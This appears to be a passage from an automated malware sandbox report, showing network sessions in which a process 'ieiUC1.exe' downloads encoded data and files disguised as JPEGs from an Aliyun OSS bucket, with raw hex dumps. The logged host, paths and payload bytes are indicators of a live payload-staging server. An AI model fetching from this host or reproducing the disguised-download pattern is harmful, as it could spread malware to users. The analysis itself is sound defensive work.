                                                                        2025-01-14 04:12:14 UTC4096INData Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56
                                                                        Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAqV
                                                                        2025-01-14 04:12:15 UTC4096INData Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb
                                                                        Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                                                        2025-01-14 04:12:15 UTC4096INData Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3
                                                                        Data Ascii: ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                                                        2025-01-14 04:12:15 UTC4096INData Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39
                                                                        Data Ascii: t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
                                                                        2025-01-14 04:12:15 UTC4096INData Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe
                                                                        Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                                        2025-01-14 04:12:15 UTC955INData Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20
                                                                        Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.11.2049763118.178.60.94431016C:\Users\user\Documents\ieiUC1.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:12:17 UTC110OUTGET /f.dat HTTP/1.1
                                                                        User-Agent: GetData
                                                                        Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                        Cache-Control: no-cache
                                                                        2025-01-14 04:12:17 UTC559INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:12:17 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 879
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E421E20C8C3532F46AF9
                                                                        Accept-Ranges: bytes
                                                                        ETag: "E54C4296F011EC91D935AA353C936E34"
                                                                        Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 11142793972884948456
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000113
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                                        x-oss-server-time: 77
                                                                        2025-01-14 04:12:17 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
                                                                        Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.11.2049764118.178.60.94431016C:\Users\user\Documents\ieiUC1.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:12:19 UTC115OUTGET /FOM-50.jpg HTTP/1.1
                                                                        User-Agent: GetData
                                                                        Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                        Cache-Control: no-cache
                                                                        2025-01-14 04:12:20 UTC546INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:12:19 GMT
                                                                        Content-Type: image/jpeg
                                                                        Content-Length: 55085
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E423F90853313201B348
                                                                        Accept-Ranges: bytes
                                                                        ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                                        Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 12339968747348072397
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000105
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                                        x-oss-server-time: 8
                                                                        2025-01-14 04:12:20 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                        Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                        2025-01-14 04:12:20 UTC4096INData Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96
                                                                        Data Ascii: |{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                                                        2025-01-14 04:12:20 UTC4096INData Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81
                                                                        Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
                                                                        2025-01-14 04:12:20 UTC4096INData Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4
                                                                        Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                                                        2025-01-14 04:12:20 UTC4096INData Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1
                                                                        Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
                                                                        2025-01-14 04:12:20 UTC4096INData Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47
                                                                        Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
                                                                        2025-01-14 04:12:20 UTC4096INData Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a
                                                                        Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                                                        2025-01-14 04:12:20 UTC4096INData Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5
                                                                        Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                                                        2025-01-14 04:12:20 UTC4096INData Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81
                                                                        Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                                        2025-01-14 04:12:20 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                                                        Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.11.2049765118.178.60.94431016C:\Users\user\Documents\ieiUC1.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:12:22 UTC115OUTGET /FOM-51.jpg HTTP/1.1
                                                                        User-Agent: GetData
                                                                        Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                        Cache-Control: no-cache
                                                                        2025-01-14 04:12:23 UTC548INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:12:23 GMT
                                                                        Content-Type: image/jpeg
                                                                        Content-Length: 4859125
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E4276F8C26323523F783
                                                                        Accept-Ranges: bytes
                                                                        ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                                                        Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 9060732723227198118
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000105
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                                                        x-oss-server-time: 11
